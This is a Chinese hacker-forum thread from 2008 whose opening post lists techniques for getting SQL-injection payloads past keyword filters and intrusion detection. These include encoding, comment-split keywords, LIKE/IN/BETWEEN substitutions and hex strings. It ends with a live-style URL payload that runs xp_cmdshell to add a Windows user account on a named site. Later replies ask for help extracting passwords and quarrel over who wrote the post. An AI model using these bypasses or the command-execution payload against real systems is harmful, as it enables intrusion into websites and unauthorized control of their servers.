查看完整版本: 突破注入的限制~

突破注入的限制~

昨天，我丢了个sina的注入点。很多孩子说不能注入。其实是可以的额，主要是细节性的东西。
突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“’”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不怎么用注入来入侵网站所以也不敢对上述过滤的效果进行评论，但是可以肯定的是，效果不会很好……  

经过我的收集，大部分的防注入程序都过滤了以下关键字：  

and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =  

而这里最难处理的就是select这个关键字了，那么我们怎样来突破他们呢？问题虽未完全解决，但还是说出来与大家分享一下，希望能抛砖引玉，让黑x 的高手们都出来说说自己的方法.  

对于关键字的过滤，以下是我收集的以及我个人的一些想法。  

1、运用编码技术绕过  

如URLEncode编码，ASCII编码绕过。例如or 1=1即

%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。


2、通过空格绕过  

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如

or’ swords’ =‘swords’  
，由于mssql的松散性，我们可以把or ’swords’ 之间的空格去掉，并不影响运行。  

3、运用字符串判断代替  

用经典的or 1=1判断绕过,如

or ’swords’ =’swords’
，这个方法就是网上正在讨论的。  

4、通过类型转换修饰符N绕过  

可以说这是一个不错的想法，除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or ’swords’ = N’ swords’ ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。  

5、通过+号拆解字符串绕过  

效果值得考证，但毕竟是一种方法。如  

or ’swords’ =‘sw’ +’ ords’ ；EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )  


6、通过LIKE绕过  

以前怎么就没想到呢？如or  

’swords’ LIKE ’sw’
！！！显然可以很轻松的绕过

“=”“>”
的限制……  

7、通过IN绕过  

与上面的LIKE的思路差不多,如
or ’swords’ IN (’swords’)  
8、通过BETWEEN绕过  
如  or ’swords’ BETWEEN ’rw’ AND ’tw’  
9、通过>或者<绕过  

or ’swords’ > ’sw’  
or ’swords’ < ’tw’  
or 1<3  

……  
10、运用注释语句绕过  
用/**/代替空格，如：
UNION /**/ Select /**/user，pwd，from tbluser  
用/**/分割敏感词，如：

U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser  

11、用HEX绕过，一般的IDS都无法检测出来  

0x730079007300610064006D0069006E00 =hex(sysadmin)  
0x640062005F006F0077006E0065007200 =hex(db_owner)  
另外，关于通用点的过滤方法，我们可以考虑采用赋值的方法，例如先声明一个变量a，然后把我们的指令赋值给a，然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下：  

　　declare @a sysname  
　　select @a=  
　　exec master.dbo.xp_cmdshell @a  

效果
[url=http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%][color=#00447b]http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%[/color][/url] 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--  
其中的  
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
就是 “net user angel pass /add” 的意思。
更深入的理解注入的原理和应用，对于经常用注入入侵的叉子们来说，是很有必要的.

我昨天手工过,不能判断是否能用UNION查询,order by也不行......请楼主把用户密码手工出来并给出方法....让大家学习下,谢谢!
人懒了,工具害人哦.....

先顶了在看 ::04:: ::04:: ::04:: ::04::

恩，满多的好象，      
注入的有点不懂

对于关键字的过滤，以下是我收集的以及我个人的一些想法。  

你的个人想法在哪里？
老实说，那十一点注入技巧两年前就在网上看见过了。

我的想法在这里：
国内的网站用ASP+Access或SQLServer的超过70%，PHP+MySQ占L20%，其他的不到10%。而SQL注入的手法那可是相当的灵活，在注入的时候我们会碰到很多意外的情况。能不能根据具体情况进行深入分析，来构造巧妙的SQL语句，从而成功获取想要的数据，是进阶高手与“菜鸟”的根本区别。
还有注入前记得把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。要不然，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息，纯属浪费.::08::

[[i] 本帖最后由 tinzon 于 2008-7-14 19:21 编辑 [/i]]

this  is  your  想法???????..........发点实在的啊....sina的注入敢兴趣啊.....楼住加油想到办法了吗...呵呵

[quote]原帖由 [i]tinzon[/i] 于 2008-7-14 19:19 发表 [url=http://bbs.hackerxfiles.net/redirect.php?goto=findpost&pid=844525&ptid=111286][img]http://bbs.hackerxfiles.net/images/common/back.gif[/img][/url]
我的想法在这里：
国内的网站用ASP+Access或SQLServer的超过70%，PHP+MySQ占L20%，其他的不到10%。而SQL注入的手法那可是相当的灵活，在注入的时候我们会碰到很多意外的情况。能不能根据具体情况进行深入分析，来构造巧妙的SQL ... [/quote]

好牛B。你的“个人”想法的居然会出现在《SQL注入天书》里。而且基本上一字不差。真是佩服！。

回复 8# 的帖子

貌似我也看过。想法赞同::08:: ::08::

难道你要我说：
注入呢，就要有个灵活的脑袋，在这个注入环境那么好的市场内，我们要把握良机。。。
在注入时，要懂得配合自己的思路，扩展技巧。。。
你要我说这些？

[[i] 本帖最后由 tinzon 于 2008-7-15 19:47 编辑 [/i]]

我来认领版权啦！::01::

《突破SQL注入限制的一点想法》
[url=http://a1pass.blog.163.com/blog/static/29713732200772083518942/]http://a1pass.blog.163.com/blog/static/29713732200772083518942/[/url]
发表时间是2007-08-21 08:18。

被 [b][size=3]啊D[/size][/b]  前辈转载后搞得网络上到处都是……

转载请注明版权哈～～::05::

[[i] 本帖最后由 a1pass 于 2008-7-16 16:40 编辑 [/i]]

回复 10# 的帖子

保存在txt里貌似没有出处。是你的吧。::08::

恩，没关系，大家都是叉子，只是说出来提个醒。

良药苦口忠言逆耳，端正好态度是最重要的，对吧？

我也在你这个阶段走过，所以很理解。^_^

[quote]原帖由 [i]tinzon[/i] 于 2008-7-15 19:41 发表 [url=http://bbs.hackerxfiles.net/redirect.php?goto=findpost&pid=845613&ptid=111286][img]http://bbs.hackerxfiles.net/images/common/back.gif[/img][/url]
貌似我也看过。想法赞同::08:: ::08::

难道你要我说：
注入呢，就要有个灵活的脑袋，在这个注入环境那么好的市场内，我们要把握良机。。。
在注入时，要懂得配合自己的思路，扩展技巧。。。
你要我说这些？ ... [/quote]

服了，把别人的原话说成是自己的“个人想法”
还这么有理，牛人牛人。。

回复 13# 的帖子

原话？你对比了是原话？::08::
人云亦云？

[[i] 本帖最后由 tinzon 于 2008-7-16 19:30 编辑 [/i]]

``````````````顶拉~~~~~~::03:: ::03:: ::03::

哈哈，貌似这里出现的事情很有趋~~~